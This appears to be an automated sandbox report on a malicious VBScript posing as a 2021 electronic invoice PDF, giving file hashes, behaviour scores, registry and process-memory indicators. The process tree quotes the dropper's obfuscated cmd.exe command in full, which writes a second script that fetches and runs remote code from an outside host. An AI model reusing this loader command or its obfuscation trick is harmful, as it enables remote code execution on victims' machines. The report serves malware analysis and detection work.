93955df34d7898b3e184ed2cd3f71fe6d5974bedd24b256b6001f595bd6e8eca

General

Target

Factura__Pdf__Electrónica__2021__SRFQRBLCNOEVZZBMZMOMOUYJGZEGOIAWE.vbs
Size

55KB
MD5

72913455b3df3773c5ee605662447542
SHA1

e71e9d4f382b468a8545827367fb8220a8b43e2c
SHA256

93955df34d7898b3e184ed2cd3f71fe6d5974bedd24b256b6001f595bd6e8eca
SHA512

cea75a82da862afaf6f8264abbc29fb92a7b29042b3a999ad0d64cdd782d2dccb27da6b692f99e726646c0d8e3924fab13131441a8c0f7aceb23324fe638246e

Score

8^/10

Blocklisted process makes network request 4 IoCs

Processes:

WScript.exe

flow pid process

12 1248 WScript.exe
14 1248 WScript.exe
16 1248 WScript.exe
18 1248 WScript.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Modifies registry class 1 IoCs

Processes:

cmd.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings cmd.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings	cmd.exe

Suspicious use of WriteProcessMemory 10 IoCs

Processes:

WScript.execmd.execmd.execmd.exe

description	pid	process	target process
PID 1440 wrote to memory of 1640	1440	WScript.exe	cmd.exe
PID 1440 wrote to memory of 1640	1440	WScript.exe	cmd.exe
PID 1640 wrote to memory of 1068	1640	cmd.exe	cmd.exe
PID 1640 wrote to memory of 1068	1640	cmd.exe	cmd.exe
PID 1640 wrote to memory of 3192	1640	cmd.exe	cmd.exe
PID 1640 wrote to memory of 3192	1640	cmd.exe	cmd.exe
PID 3192 wrote to memory of 3172	3192	cmd.exe	cmd.exe
PID 3192 wrote to memory of 3172	3192	cmd.exe	cmd.exe
PID 3172 wrote to memory of 1248	3172	cmd.exe	WScript.exe
PID 3172 wrote to memory of 1248	3172	cmd.exe	WScript.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Factura__Pdf__Electrónica__2021__SRFQRBLCNOEVZZBMZMOMOUYJGZEGOIAWE.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:1440
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /V/D/c "SEt NS2=.vb&&SEt a8230= ry402 =sbs073 ^"scsbs073risbs073ptsbs073:^": f7qwkk78 =sbs073 ^"hsbs073TtPssbs073:^": Gsbs073etsbs073Objsbs073ecsbs073t(sbs073ry402+f7qwkk78+^"&&sET sbs073=ihr21ihr21mut4h.gotdns.ch/p2.php^")&&sEt/^p h5p35="%a8230:sbs073=%%sbs073:ihr21=/%"<nul > C:\Users\Public\^udd44%NS2%s|start cmd /c start C:\Users\Public\^udd44%NS2%s"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1640
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" sEt/p h5p35="%a8230:sbs073=%%sbs073:ihr21=/%" 0<nul 1>C:\Users\Public\udd44%NS2%s"
    3⤵
    PID:1068
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" start cmd /c start C:\Users\Public\udd44%NS2%s "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3192
  - - C:\Windows\system32\cmd.exe
      cmd /c start C:\Users\Public\udd44.vbs
      4⤵
      Modifies registry class
      Suspicious use of WriteProcessMemory
      PID:3172
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Public\udd44.vbs"
        5⤵
        Blocklisted process makes network request
        
        PID:1248

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

C:\Users\Public\udd44.vbs

MD5
d0991d5a2435330753466e9f814747f5

SHA1
5e873187ba802c0337955510d7ff930144312e24

SHA256
28ae38140132e8ca64eda3a1b35c37e7502ae0c8133b21488e543e7b3eed88b1

SHA512
23fb7d9e29819da7d97698ffbaf5723b03f6f50bcc92c1a2d41f0f5dbfc5f5ebb653822119e7bf3ce6bcc73c0c33172a8456ae232aec277aa68502bb7583cd4c

Download Submit
memory/1068-115-0x0000000000000000-mapping.dmp

Download
memory/1248-119-0x0000000000000000-mapping.dmp

Download
memory/1640-114-0x0000000000000000-mapping.dmp

Download
memory/3172-117-0x0000000000000000-mapping.dmp

Download
memory/3192-116-0x0000000000000000-mapping.dmp

Download